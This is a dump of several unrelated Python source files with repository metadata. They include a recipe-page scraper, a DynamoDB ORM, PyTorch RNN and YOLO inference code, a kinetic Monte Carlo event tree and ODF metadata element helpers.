import requests import time from bs4 import BeautifulSoup def get_web_page(url): resp = requests.get( url=url, ) if resp.status_code != 200: print('Invalid url:', resp.url) return None else: return resp.text def get_articles(dom): soup = BeautifulSoup(dom, 'html.parser') tag = soup.find_all('a','recipe-name') articles=tag return articles def run(): page = get_web_page('https://icook.tw/recipes/popular?ref=icook-footer') if page: current_articles = get_articles(page) i=1 s='' for post in current_articles: temp=str(post) num=int(temp.find("\" href=")) #print('The Number {0}: {1}'.format(i, temp[35:num])) s=s+'The Number {0}: {1}\n'.format(i, temp[35:num]) i=i+1 return s
22.641026
76
0.551529
0
0
0
0
0
0
0
0
182
0.206116
4c7abb53711251283db1d2b1869388b7608f3858
21,493
py
Python
awstin/dynamodb/orm.py
k2bd/awstin
7360cc20d3c72a6aa87de57146b9c5f4247c58d5
[ "MIT" ]
1
2020-12-29T20:49:27.000Z
2020-12-29T20:49:27.000Z
awstin/dynamodb/orm.py
k2bd/awstin
7360cc20d3c72a6aa87de57146b9c5f4247c58d5
[ "MIT" ]
69
2020-11-16T21:16:44.000Z
2021-04-14T17:16:33.000Z
awstin/dynamodb/orm.py
k2bd/awstin
7360cc20d3c72a6aa87de57146b9c5f4247c58d5
[ "MIT" ]
null
null
null
import uuid from abc import ABC, abstractmethod from collections import defaultdict from typing import Union from boto3.dynamodb.conditions import Attr as BotoAttr from boto3.dynamodb.conditions import Key as BotoKey from awstin.dynamodb.utils import from_decimal, to_decimal class NotSet: """ A value of an attribute on a data model is not present in a DynamoDB result """ def __str__(self): return "<<Attribute not set>>" def __repr__(self): return "<<Attribute not set>>" NOT_SET = NotSet() class BaseAttribute: def __init__(self, attribute_name: Union[str, None] = None): """ Parameters ---------- attribute_name : str, optional Name of the property in the DynamoDB table. Defaults to the name of the attribute on the DynamoModel class. """ # Set by user self._attribute_name = attribute_name # Set by Model self._name_on_model = None @property def _awstin_name(self): if self._attribute_name is not None: return self._attribute_name else: return self._name_on_model def __getattr__(self, name): """ Support for nested mapping queries """ try: return super().__getattr__(name) except AttributeError: return type(self)(attribute_name=f"{self._awstin_name}.{name}") def __getitem__(self, index): """ Support for nested container queries """ return type(self)(attribute_name=f"{self._awstin_name}[{index}]") # --- Query and scan filter expressions --- def begins_with(self, value): """ Filter results by a key or attribute beginning with a value Parameters ---------- value : str Starting string for returned results """ return self._query_type(self._awstin_name).begins_with(to_decimal(value)) def between(self, low, high): """ Filter results by range (inclusive) Parameters ---------- low : Any Low end of the range high : Any High end of the range """ return self._query_type(self._awstin_name).between( to_decimal(low), to_decimal(high), ) def __eq__(self, value): return self._query_type(self._awstin_name).eq(to_decimal(value)) def __gt__(self, value): return self._query_type(self._awstin_name).gt(to_decimal(value)) def __ge__(self, value): return self._query_type(self._awstin_name).gte(to_decimal(value)) def __lt__(self, value): return self._query_type(self._awstin_name).lt(to_decimal(value)) def __le__(self, value): return self._query_type(self._awstin_name).lte(to_decimal(value)) def attribute_type(self, value): """ Filter results by attribute type Parameters ---------- value : str Index for a DynamoDB attribute type (e.g. "N" for Number) """ return BotoAttr(self._awstin_name).attribute_type(to_decimal(value)) def contains(self, value): """ Filter results by attributes that are containers and contain the target value Parameters ---------- values : Any Result must contain this item """ return BotoAttr(self._awstin_name).contains(to_decimal(value)) def exists(self): """ Filter results by existence of an attribute """ return BotoAttr(self._awstin_name).exists() def in_(self, values): """ Filter results by existence in a set Parameters ---------- values : list of Any Allowed values of returned results """ in_values = [to_decimal(value) for value in values] return BotoAttr(self._awstin_name).is_in(in_values) def __ne__(self, value): return BotoAttr(self._awstin_name).ne(to_decimal(value)) def not_exists(self): """ Filter results by non-existence of an attribute """ return BotoAttr(self._awstin_name).not_exists() def size(self): """ Filter by size of a collection """ return Size(self._awstin_name) # --- Update expressions --- def set(self, expression): """ Set an attribute to a new value. Corresponds to SET as part of the update expression in ``Table.update_item``. Parameters ---------- expression : UpdateOperand New value, or an expression defining a new value """ return SetOperator(self, UpdateOperand(expression)) def remove(self): """ Remove an attribute. Corresponds to REMOVE as part of the update expression in ``Table.update_item``. """ return RemoveOperator(self) def add(self, expression): """ Add to an attribute (numerical add or addition to a set). Corresponds to ADD as part of the update expression in ``Table.update_item``. Parameters ---------- expression : UpdateOperand Value to add """ return AddOperator(self, UpdateOperand(expression)) def delete(self, expression): """ Delete part of a set attribute. Corresponds to DELETE as part of the update expression in ``Table.update_item``. Parameters ---------- expression : UpdateOperand Value to delete """ return DeleteOperator(self, UpdateOperand(expression)) def __add__(self, other): return CombineOperand(UpdateOperand(self), UpdateOperand(other), "+") def __sub__(self, other): return CombineOperand(UpdateOperand(self), UpdateOperand(other), "-") def __radd__(self, other): return CombineOperand(UpdateOperand(other), UpdateOperand(self), "+") def __rsub__(self, other): return CombineOperand(UpdateOperand(other), UpdateOperand(self), "-") def if_not_exists(self, value): """ Conditionally return a value if this attribute doesn't exist on the model """ return IfNotExistsOperand(UpdateOperand(self), UpdateOperand(value)) class Key(BaseAttribute): """ Used to define and query hash and sort key attributes on a dynamodb table data model """ _query_type = BotoKey class Attr(BaseAttribute): """ Used to define and query non-key attributes on a dynamodb table data model """ _query_type = BotoAttr def size_query(self, *args, **kwargs): return BotoAttr(self._awstin_name).size() class Size(BaseAttribute): _query_type = size_query class DynamoModelMeta(type): def __getattribute__(self, name): attr = super().__getattribute__(name) if isinstance(attr, BaseAttribute): attr._name_on_model = name return attr else: return attr def _dynamodb_attributes(self): result = { getattr(self, attr)._awstin_name: attr for attr in dir(self) if isinstance(getattr(self, attr), BaseAttribute) } return result def _get_kwargs(self): """ Kwargs that should be passed to query, scan, get_item """ return { **self._dynamo_projection(), **self._index_kwargs(), } def _dynamo_projection(self): """ Attributes to request when retrieving data from DynamoDB Returns ------- dict kwargs to be passed to DynamoDB get attribute calls to employ a projection expression and placeholders """ placeholders = { "#" + str(uuid.uuid4())[:8]: value for value in self._dynamodb_attributes().keys() } expression = ", ".join(placeholders.keys()) return dict( ProjectionExpression=expression, ExpressionAttributeNames=placeholders, ) def _index_kwargs(self): if hasattr(self, "_index_name_"): return dict( IndexName=self._index_name_, ) else: return {} class DynamoModel(metaclass=DynamoModelMeta): """ Class defining an ORM model for a DynamoDB table. Subclasses must have a ``_table_name_`` attribute. Attributes making up the data model should be Attr or Key instances. Subclasses representing indexes should also have an ``_index_name_`` attribute """ def __init__(self, **kwargs): """ Parameters ---------- **kwargs : dict of (str, Any) Initialization of Attr and Key attributes. """ model_attrs = type(self)._dynamodb_attributes().values() for name in model_attrs: setattr(self, name, NOT_SET) for name, value in kwargs.items(): if name not in model_attrs: msg = f"{type(self)!r} has no attribute {name!r}" raise AttributeError(msg) setattr(self, name, value) @classmethod def deserialize(cls, data): """ Deserialize JSON into a DynamoModel subclass. Internally converts Decimal to float in the deserialization. Parameters ---------- data : dict of (str, Any) Serialized model Returns ------- DynamoModel The deserialized data model """ model_attrs = cls._dynamodb_attributes() result = cls() for attr in model_attrs.values(): setattr(result, attr, NOT_SET) for db_attr, value in data.items(): if db_attr in model_attrs.keys(): if type(value) in [list, set, tuple]: value = type(value)(from_decimal(v) for v in value) elif type(value) is dict: value = {from_decimal(k): from_decimal(v) for k, v in value.items()} else: value = from_decimal(value) setattr(result, model_attrs[db_attr], value) return result def serialize(self): """ Serialize a DynamoModel subclass to JSON that can be inserted into DynamoDB. Internally converts float to Decimal. Returns ------- dict of (str, Any) The serialized JSON entry """ model_attrs = type(self)._dynamodb_attributes() result = {} for dynamo_name, model_name in model_attrs.items(): value = getattr(self, model_name) if value is not NOT_SET: if type(value) in [list, set, tuple]: value = type(value)(to_decimal(v) for v in value) elif type(value) is dict: value = {to_decimal(k): to_decimal(v) for k, v in value.items()} else: value = to_decimal(value) result[dynamo_name] = value return result # ---- Update Operators class UpdateOperator(ABC): """ A representation of an UpdateItem expression """ def __and__(self, other): """ Combine two update expressions """ return CombineOperator(self, other) @abstractmethod def update_dict(self): pass @staticmethod def update_expression(update_dict): expressions = [] for operation in "SET", "ADD", "DELETE", "REMOVE": if update_dict.get(operation): expressions.append(operation + " " + ", ".join(update_dict[operation])) return " ".join(expressions) def serialize(self): """ Produce kwargs to be passed to DynamoDB Table.update_item. Keys and values are: "UpdateExpression": string representing the update expression "ExpressionAttributeNames": Placeholder map for attribute names "ExpressionAttributeValues": Placeholder map for attribute values Returns ------- dict Kwargs for update_item """ update_dict = self.update_dict() result = { "UpdateExpression": self.update_expression(update_dict), } if update_dict["ExpressionAttributeNames"]: result["ExpressionAttributeNames"] = update_dict["ExpressionAttributeNames"] if update_dict["ExpressionAttributeValues"]: result["ExpressionAttributeValues"] = update_dict[ "ExpressionAttributeValues" ] return result class CombineOperator(UpdateOperator): """ Combine two update expressions """ def __init__(self, left, right): self.left = left self.right = right def update_dict(self): result = defaultdict(list) ser_left = self.left.update_dict() ser_right = self.right.update_dict() items = list(ser_left.items()) + list(ser_right.items()) for key, values in items: if key in ["SET", "ADD", "DELETE", "REMOVE"]: result[key].extend(values) result["ExpressionAttributeNames"] = dict( **ser_left["ExpressionAttributeNames"], **ser_right["ExpressionAttributeNames"], ) result["ExpressionAttributeValues"] = dict( **ser_left["ExpressionAttributeValues"], **ser_right["ExpressionAttributeValues"], ) return result class SetOperator(UpdateOperator): """ Support for SET """ def __init__(self, attr, operand): self.attr = attr self.operand = operand def update_dict(self): serialized_attr = itemize_attr(self.attr) serialized_operand = self.operand.serialize() attribute_names = dict( **serialized_operand["ExpressionAttributeNames"], **serialized_attr["ExpressionAttributeNames"], ) return { "SET": [ f"{serialized_attr['UpdateExpression']} = " + serialized_operand["UpdateExpression"] ], "ExpressionAttributeNames": attribute_names, "ExpressionAttributeValues": serialized_operand[ "ExpressionAttributeValues" ], } class AddOperator(UpdateOperator): def __init__(self, attr, operand): self.attr = attr self.operand = operand def update_dict(self): serialized_attr = itemize_attr(self.attr) serialized_operand = self.operand.serialize() attribute_names = dict( **serialized_operand["ExpressionAttributeNames"], **serialized_attr["ExpressionAttributeNames"], ) return { "ADD": [ f"{serialized_attr['UpdateExpression']} " + serialized_operand["UpdateExpression"] ], "ExpressionAttributeNames": attribute_names, "ExpressionAttributeValues": serialized_operand[ "ExpressionAttributeValues" ], } class RemoveOperator(UpdateOperator): def __init__(self, attr): self.attr = attr def update_dict(self): serialized_attr = itemize_attr(self.attr) return { "REMOVE": [serialized_attr["UpdateExpression"]], "ExpressionAttributeNames": serialized_attr["ExpressionAttributeNames"], "ExpressionAttributeValues": {}, } class DeleteOperator(UpdateOperator): def __init__(self, attr, operand): self.attr = attr self.operand = operand def update_dict(self): serialized_attr = itemize_attr(self.attr) serialized_operand = self.operand.serialize() attribute_names = dict( **serialized_operand["ExpressionAttributeNames"], **serialized_attr["ExpressionAttributeNames"], ) return { "DELETE": [ f"{serialized_attr['UpdateExpression']} " + serialized_operand["UpdateExpression"] ], "ExpressionAttributeNames": attribute_names, "ExpressionAttributeValues": serialized_operand[ "ExpressionAttributeValues" ], } # ---- Update Operands def serialize_operand(value): name = str(uuid.uuid4())[:8] if isinstance(value, UpdateOperand): return value.serialize() elif isinstance(value, BaseAttribute): return itemize_attr(value) elif type(value) in [list, set, tuple]: name = ":" + name value = type(value)([to_decimal(v) for v in value]) return { "UpdateExpression": name, "ExpressionAttributeNames": {}, "ExpressionAttributeValues": {name: value}, } else: name = ":" + name return { "UpdateExpression": name, "ExpressionAttributeNames": {}, "ExpressionAttributeValues": {name: to_decimal(value)}, } def itemize_attr(attr): # Separate indexes parts = [] current_section = "" for letter in attr._awstin_name: if letter == "[": parts.append(current_section) current_section = "[" elif letter == "]": parts.append(current_section + "]") current_section = "" else: current_section += letter if current_section: parts.append(current_section) serialized = "" name_map = {} # Separate attributes for part in parts: if "[" in part and "]" in part: serialized += part else: if part.startswith("."): serialized += "." part = part[1:] sections = part.split(".") serialized_sections = [] for section in sections: name = "#" + str(uuid.uuid4())[:8] name_map[name] = section serialized_sections.append(name) serialized += ".".join(serialized_sections) result = { "UpdateExpression": serialized, "ExpressionAttributeNames": name_map, "ExpressionAttributeValues": {}, } return result class UpdateOperand: """ Inner part of an update expression """ def __init__(self, value): self.value = value def serialize(self): return serialize_operand(self.value) class CombineOperand(UpdateOperand): """ Add or subtact two expressions """ def __init__(self, left, right, symbol): self.left = left self.right = right self.symbol = symbol def serialize(self): ser_left = serialize_operand(self.left) ser_right = serialize_operand(self.right) expression = ( f"{ser_left['UpdateExpression']} " f"{self.symbol} " f"{ser_right['UpdateExpression']}" ) return { "UpdateExpression": expression, "ExpressionAttributeNames": dict( **ser_left["ExpressionAttributeNames"], **ser_right["ExpressionAttributeNames"], ), "ExpressionAttributeValues": dict( **ser_left["ExpressionAttributeValues"], **ser_right["ExpressionAttributeValues"], ), } class IfNotExistsOperand(UpdateOperand): """ Set a value if the given attribute does not exist """ def __init__(self, attr, value): self.attr = attr self.value = value def serialize(self): ser_attr = serialize_operand(self.attr) ser_value = serialize_operand(self.value) expression = ( f"if_not_exists({ser_attr['UpdateExpression']}, " f"{ser_value['UpdateExpression']})" ) return { "UpdateExpression": expression, "ExpressionAttributeNames": dict( **ser_attr["ExpressionAttributeNames"], **ser_value["ExpressionAttributeNames"], ), "ExpressionAttributeValues": dict( **ser_attr["ExpressionAttributeValues"], **ser_value["ExpressionAttributeValues"], ), } class ListAppendOperand(UpdateOperand): """ Combine two lists """ def __init__(self, left, right): self.left = left self.right = right def serialize(self): ser_left = serialize_operand(self.left) ser_right = serialize_operand(self.right) expression = ( f"list_append({ser_left['UpdateExpression']}, " f"{ser_right['UpdateExpression']})" ) return { "UpdateExpression": expression, "ExpressionAttributeNames": dict( **ser_left["ExpressionAttributeNames"], **ser_right["ExpressionAttributeNames"], ), "ExpressionAttributeValues": dict( **ser_left["ExpressionAttributeValues"], **ser_right["ExpressionAttributeValues"], ), } def list_append(left, right): """ Set a value to the combination of two lists in an update expression """ return ListAppendOperand(UpdateOperand(left), UpdateOperand(right))
27.912987
88
0.579258
18,878
0.878332
0
0
1,584
0.073698
0
0
7,566
0.352022
d5b22ea34f0bbc299fab73839184251258eecd69
310
py
Python
Losses/__init__.py
SimonTheVillain/ActiveStereoNet
708bddce844998b366be1a1ec8a72a31ccd26f8c
[ "MIT" ]
17
2019-08-23T04:00:32.000Z
2022-02-06T13:37:02.000Z
Losses/__init__.py
SimonTheVillain/ActiveStereoNet
708bddce844998b366be1a1ec8a72a31ccd26f8c
[ "MIT" ]
null
null
null
Losses/__init__.py
SimonTheVillain/ActiveStereoNet
708bddce844998b366be1a1ec8a72a31ccd26f8c
[ "MIT" ]
7
2019-12-20T07:46:41.000Z
2021-11-01T04:18:19.000Z
from .supervise import * def get_losses(name, **kwargs): name = name.lower() if name == 'rhloss': loss = RHLoss(**kwargs) elif name == 'xtloss': loss = XTLoss(**kwargs) else: raise NotImplementedError('Loss [{:s}] is not supported.'.format(name)) return loss
22.142857
79
0.580645
0
0
0
0
0
0
0
0
47
0.151613
d5b25fcda4db3927e0504a3caa222468f8e2eb7c
6,766
py
Python
model/src/recurrent.py
qkaren/converse_reading_cmr
d06d981be12930cff8458e2b1b81be4f5df3a329
[ "MIT" ]
87
2019-06-07T18:16:30.000Z
2021-11-27T08:18:45.000Z
model/src/recurrent.py
qkaren/converse_reading_cmr
d06d981be12930cff8458e2b1b81be4f5df3a329
[ "MIT" ]
11
2019-06-19T20:53:27.000Z
2021-05-07T01:05:01.000Z
model/src/recurrent.py
qkaren/converse_reading_cmr
d06d981be12930cff8458e2b1b81be4f5df3a329
[ "MIT" ]
17
2019-06-08T01:50:23.000Z
2022-02-16T07:12:15.000Z
import torch import torch.nn as nn from torch.nn.parameter import Parameter from torch.nn.utils.rnn import pad_packed_sequence as unpack from torch.nn.utils.rnn import pack_padded_sequence as pack from .my_optim import weight_norm as WN # TODO: use system func to bind ~ RNN_MAP = {'lstm': nn.LSTM, 'gru': nn.GRU, 'rnn': nn.RNN} class OneLayerBRNN(nn.Module): def __init__(self, input_size, hidden_size, prefix='stack_rnn', opt={}, dropout=None): super(OneLayerBRNN, self).__init__() self.opt = opt self.prefix = prefix self.cell_type = self.opt.get('{}_cell'.format(self.prefix), 'lstm') self.emb_dim = self.opt.get('{}_embd_dim'.format(self.prefix), 0) self.maxout_on = self.opt.get('{}_maxout_on'.format(self.prefix), False) self.weight_norm_on = self.opt.get('{}_weight_norm_on'.format(self.prefix), False) self.dropout = dropout self.output_size = hidden_size if self.maxout_on else hidden_size * 2 self.hidden_size = hidden_size self.rnn = RNN_MAP[self.cell_type](input_size, hidden_size, num_layers=1, bidirectional=True) def forward(self, x, x_mask): x = x.transpose(0, 1) size = list(x.size()) rnn_output, h = self.rnn(x) if self.maxout_on: rnn_output = rnn_output.view(size[0], size[1], self.hidden_size, 2).max(-1)[0] # Transpose back hiddens = rnn_output.transpose(0, 1) return hiddens class BRNNEncoder(nn.Module): def __init__(self, input_size, hidden_size, prefix='rnn', opt={}, dropout=None): super(BRNNEncoder, self).__init__() self.opt = opt self.dropout = dropout self.cell_type = opt.get('{}_cell'.format(self.prefix), 'gru') self.weight_norm_on = opt.get('{}_weight_norm_on'.format(self.prefix), False) self.top_layer_only = opt.get('{}_top_layer_only'.format(self.prefix), False) self.num_layers = opt.get('{}_num_layers'.format(self.prefix), 1) self.rnn = RNN_MAP[self.cell_type](input_size, hidden_size, self.num_layers, bidirectional=True) if self.weight_norm_on: self.rnn = WN(self.rnn) if self.top_layer_only: self.output_size = hidden_size * 2 else: self.output_size = self.num_layers * hidden_size * 2 def forward(self, x, x_mask): x = self.dropout(x) _, h = self.rnn(x.transpose(0, 1).contiguous()) if self.cell_type == 'lstm': h = h[0] shape = h.size() h = h.view(self.num_layers, 2, shape[1], shape[3]).transpose(1,2).contiguous() h = h.view(self.num_layers, shape[1], 2 * shape[3]) if self.top_layer_only: return h[-1] else: return h.transose(0, 1).contiguous().view(x.size(0), -1) #------------------------------ # Contextual embedding # TODO: remove packing to speed up # Credit from: https://github.com/salesforce/cove #------------------------------ class ContextualEmbedV2(nn.Module): def __init__(self, model_path, padding_idx=0): super(ContextualEmbedV2, self).__init__() state_dict = torch.load(model_path) self.rnn1 = nn.LSTM(300, 300, num_layers=1, bidirectional=True) self.rnn2 = nn.LSTM(600, 300, num_layers=1, bidirectional=True) state_dict1 = dict([(name, param.data) if isinstance(param, Parameter) else (name, param) for name, param in state_dict.items() if '0' in name]) state_dict2 = dict([(name.replace('1', '0'), param.data) if isinstance(param, Parameter) else (name.replace('1', '0'), param) for name, param in state_dict.items() if '1' in name]) self.rnn1.load_state_dict(state_dict1) self.rnn2.load_state_dict(state_dict2) for p in self.parameters(): p.requires_grad = False self.output_size = 600 self.output_size = 600 def setup_eval_embed(self, eval_embed, padding_idx=0): pass def forward(self, x, x_mask): """A pretrained MT-LSTM (McCann et. al. 2017). """ lengths = x_mask.data.eq(0).long().sum(1).squeeze() lens, indices = torch.sort(lengths, 0, True) output1, _ = self.rnn1(pack(x[indices], lens.tolist(), batch_first=True)) output2, _ = self.rnn2(output1) output1 = unpack(output1, batch_first=True)[0] output2 = unpack(output2, batch_first=True)[0] _, _indices = torch.sort(indices, 0) output1 = output1[_indices] output2 = output2[_indices] return output1, output2 class ContextualEmbed(nn.Module): def __init__(self, path, vocab_size, emb_dim=300, embedding=None, padding_idx=0): super(ContextualEmbed, self).__init__() self.embedding = nn.Embedding(vocab_size, emb_dim, padding_idx=padding_idx) if embedding is not None: self.embedding.weight.data = embedding state_dict = torch.load(path) self.rnn1 = nn.LSTM(300, 300, num_layers=1, bidirectional=True) self.rnn2 = nn.LSTM(600, 300, num_layers=1, bidirectional=True) state_dict1 = dict([(name, param.data) if isinstance(param, Parameter) else (name, param) for name, param in state_dict.items() if '0' in name]) state_dict2 = dict([(name.replace('1', '0'), param.data) if isinstance(param, Parameter) else (name.replace('1', '0'), param) for name, param in state_dict.items() if '1' in name]) self.rnn1.load_state_dict(state_dict1) self.rnn2.load_state_dict(state_dict2) for p in self.parameters(): p.requires_grad = False self.output_size = 600 def setup_eval_embed(self, eval_embed, padding_idx=0): self.eval_embed = nn.Embedding(eval_embed.size(0), eval_embed.size(1), padding_idx = padding_idx) self.eval_embed.weight.data = eval_embed for p in self.eval_embed.parameters(): p.requires_grad = False def forward(self, x_idx, x_mask): emb = self.embedding if self.training else self.eval_embed x_hiddens = emb(x_idx) lengths = x_mask.data.eq(0).long().sum(1) lens, indices = torch.sort(lengths, 0, True) output1, _ = self.rnn1(pack(x_hiddens[indices], lens.tolist(), batch_first=True)) output2, _ = self.rnn2(output1) output1 = unpack(output1, batch_first=True)[0] output2 = unpack(output2, batch_first=True)[0] _, _indices = torch.sort(indices, 0) output1 = output1[_indices] output2 = output2[_indices] return output1, output2
45.716216
134
0.619125
6,228
0.920485
0
0
0
0
0
0
484
0.071534
d5b27d5f6e6878759cb3ab473c4702b3507a5b67
2,810
py
Python
kmcsim/sim/events_old.py
vlcekl/kmcpy
b55a23f64d4b6d2871671f4a16346cc897c4a2a5
[ "MIT" ]
null
null
null
kmcsim/sim/events_old.py
vlcekl/kmcpy
b55a23f64d4b6d2871671f4a16346cc897c4a2a5
[ "MIT" ]
null
null
null
kmcsim/sim/events_old.py
vlcekl/kmcpy
b55a23f64d4b6d2871671f4a16346cc897c4a2a5
[ "MIT" ]
null
null
null
#!//anaconda/envs/py36/bin/python # # File name: kmc_pld.py # Date: 2018/08/03 09:07 # Author: Lukas Vlcek # # Description: # import numpy as np from collections import Counter class EventTree: """ Class maintaining a binary tree for random event type lookup and arrays for choosing specific event. """ def __init__(self, rates, events): self.rates = rates self.events = events self.__setup() def __build_tree(self, e_ratio): self.event_tree = [] # create event ratio array level 0 - bottom if len(e_ratio) % 2 == 1: e_ratio.extend([0.0]) # create the bottom level (rates*numbers) self.event_tree.append(np.array(e_ratio)) # create partial summs (iteratively) up to the 2nd highest level while len(e_ratio) > 2: e_ratio = [e_ratio[i]+e_ratio[i+1] for i in range(0, len(e_ratio), 2)] if len(e_ratio) % 2 == 1: e_ratio.extend([0.0]) self.event_tree.append(np.array(e_ratio)) # create top level = sum of all rates self.event_tree.append(np.array(sum(e_ratio))) def __setup(self): # Get dictionary of event type counts e_counts = Counter([e['type'] for e in self.events]) print(e_counts) # create a list of events based on event types self.event_counts = [[] for _ in range(len(self.rates))] for e in self.events: self.event_counts[e['type']].append(e) e_ratio = [e_counts.get(t, 0)*r for t, r in enumerate(self.rates)] print('e_ratio', e_ratio) self.__build_tree(e_ratio) def update_events(self, old_events, new_events): """ Update tree: remove old events and add new events """ pass def find_event(self): """Find and return an event""" # generate a random number [0,Rs) q = self.Rs*np.random.random() # cycle through levels (top->down) # start with top-level child (k-2) end with level above bottom (1) j = 0 for k in range(len(self.event_tree)-2, 0, -1): # left child value left = self.event_tree[k][j] if q < left: j = 2*j else: q -= left j = 2*j + 1 # bottom level - return selected event type if q < self.event_tree[0][j]: event_type = self.events[j] else: event_type = self.events[j+1] # select a random event index of a given type event_number = np.random.randint(len(self.event_counts[event_type])) # get the event object event = event_counts[event_type][event_number] return event
26.509434
82
0.56548
2,614
0.930249
0
0
0
0
0
0
916
0.325979
d5b2899060598acf5361fb2c9db968e61435c9da
2,181
py
Python
env/lib/python3.6/site-packages/odf/meta.py
anthowen/duplify
846d01c1b21230937fdf0281b0cf8c0b08a8c24e
[ "MIT" ]
5,079
2015-01-01T03:39:46.000Z
2022-03-31T07:38:22.000Z
env/lib/python3.6/site-packages/odf/meta.py
anthowen/duplify
846d01c1b21230937fdf0281b0cf8c0b08a8c24e
[ "MIT" ]
1,623
2015-01-01T08:06:24.000Z
2022-03-30T19:48:52.000Z
env/lib/python3.6/site-packages/odf/meta.py
anthowen/duplify
846d01c1b21230937fdf0281b0cf8c0b08a8c24e
[ "MIT" ]
2,033
2015-01-04T07:18:02.000Z
2022-03-28T19:55:47.000Z
# -*- coding: utf-8 -*- # Copyright (C) 2006-2007 Søren Roug, European Environment Agency # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA # # Contributor(s): # from odf.namespaces import METANS from odf.element import Element # Autogenerated def AutoReload(**args): return Element(qname = (METANS,'auto-reload'), **args) def CreationDate(**args): return Element(qname = (METANS,'creation-date'), **args) def DateString(**args): return Element(qname = (METANS,'date-string'), **args) def DocumentStatistic(**args): return Element(qname = (METANS,'document-statistic'), **args) def EditingCycles(**args): return Element(qname = (METANS,'editing-cycles'), **args) def EditingDuration(**args): return Element(qname = (METANS,'editing-duration'), **args) def Generator(**args): return Element(qname = (METANS,'generator'), **args) def HyperlinkBehaviour(**args): return Element(qname = (METANS,'hyperlink-behaviour'), **args) def InitialCreator(**args): return Element(qname = (METANS,'initial-creator'), **args) def Keyword(**args): return Element(qname = (METANS,'keyword'), **args) def PrintDate(**args): return Element(qname = (METANS,'print-date'), **args) def PrintedBy(**args): return Element(qname = (METANS,'printed-by'), **args) def Template(**args): args.setdefault('type', 'simple') return Element(qname = (METANS,'template'), **args) def UserDefined(**args): return Element(qname = (METANS,'user-defined'), **args)
32.073529
80
0.707474
0
0
0
0
0
0
0
0
1,054
0.483043
d5b2a5e3c1f4caec8e1b4e760aef349c24f989cf
7,293
py
Python
scripts/my_inference.py
Mr-TalhaIlyas/Scaled-YOLOv4
2b0326a6bc1eba386eb1a78b56727dcf29c77bac
[ "MIT" ]
null
null
null
scripts/my_inference.py
Mr-TalhaIlyas/Scaled-YOLOv4
2b0326a6bc1eba386eb1a78b56727dcf29c77bac
[ "MIT" ]
null
null
null
scripts/my_inference.py
Mr-TalhaIlyas/Scaled-YOLOv4
2b0326a6bc1eba386eb1a78b56727dcf29c77bac
[ "MIT" ]
null
null
null
import os os.environ['CUDA_VISIBLE_DEVICES'] = '2' import torch torch.rand(10) import torch.nn as nn import torch.nn.functional as F import glob from tqdm import tqdm, trange print(torch.cuda.is_available()) print(torch.cuda.get_device_name()) print(torch.cuda.current_device()) device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') print('Using device:', device) print() #Additional Info when using cuda if device.type == 'cuda': print(torch.cuda.get_device_name(0)) print('Memory Usage:') print('Allocated:', round(torch.cuda.memory_allocated(0)/1024**3,1), 'GB') print('Cached: ', round(torch.cuda.memory_reserved(0)/1024**3,1), 'GB') import torch.backends.cudnn as cudnn import numpy as np import os, cv2 from tqdm import tqdm, trange import seaborn as sns from models.experimental import attempt_load from utils.datasets import LoadStreams, LoadImages from utils.general import ( check_img_size, non_max_suppression, apply_classifier, scale_coords, xyxy2xywh, plot_one_box, strip_optimizer) from utils.torch_utils import select_device, load_classifier, time_synchronized from my_utils import xyxy_2_xyxyo, draw_boxes # Initialize device = select_device('') half = device.type != 'cpu' # half precision only supported on CUDA def prepare_input(img1, img_size=416, half=True): img2 = cv2.resize(img1, (img_size, img_size)) # W x H img2 = img2.transpose(2,0,1) img2 = img2[np.newaxis, ...] img2 = torch.from_numpy(img2).to(device) # torch image is ch x H x W img2 = img2.half() if not half else img2.float() img2 /= 255.0 return img2 #%% # Directories out = '/home/user01/data_ssd/Talha/yolo/op/' weights = '/home/user01/data_ssd/Talha/yolo/ScaledYOLOv4/runs/exp2_yolov4-csp-results/weights/best_yolov4-csp-results.pt' source = '/home/user01/data_ssd/Talha/yolo/paprika_y5/valid/images/' imgsz = 416 conf_thres = 0.4 iou_thres = 0.5 classes = [0,1,2,3,4,5] class_names = ["blossom_end_rot", "graymold","powdery_mildew","spider_mite", "spotting_disease", "snails_and_slugs"] # deleting files in op_dir filelist = [ f for f in os.listdir(out)]# if f.endswith(".png") ] for f in tqdm(filelist, desc = 'Deleting old files fro directory'): os.remove(os.path.join(out, f)) # Load model model = attempt_load(weights, map_location=device) # load FP32 model imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size if half: model.half() # to FP16 # Load model model = attempt_load(weights, map_location=device) # load FP32 model imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size img_paths = glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png') + \ glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg') # Run inference if device.type != 'cpu': model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once #%% for i in trange(len(img_paths)): path = img_paths[i] img1 = cv2.imread(path) img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB) img_h, img_w, _ = img1.shape img2 = prepare_input(img1, 416, half) # get file name name = os.path.basename(path)[:-4] # Inference t1 = time_synchronized() pred = model(img2, augment=False)[0] # Apply NMS pred = non_max_suppression(pred, conf_thres, iou_thres, classes=classes, agnostic=True) if pred[0] is not None: boxes = pred[0].cpu().detach().numpy() # <xmin><ymin><xmax><ymax><confd><class_id> else: boxes = np.array([10.0, 20.0, 30.0, 50.0, 0.75, 0]).reshape(1,6) # dummy values coords_minmax = np.zeros((boxes.shape[0], 4)) # droping 5th value confd = np.zeros((boxes.shape[0], 1)) class_ids = np.zeros((boxes.shape[0], 1)) # assign coords_minmax = boxes[:,0:4] # coords confd = boxes[:,4] # confidence class_ids = boxes[:,5] # class id coords_xyminmax = [] det_classes = [] for i in range(boxes.shape[0]): coords_xyminmax.append(xyxy_2_xyxyo(img_w, img_h, coords_minmax[i])) det_classes.append(class_names[int(class_ids[i])]) all_bounding_boxnind = [] for i in range(boxes.shape[0]): bounding_box = [0.0] * 6 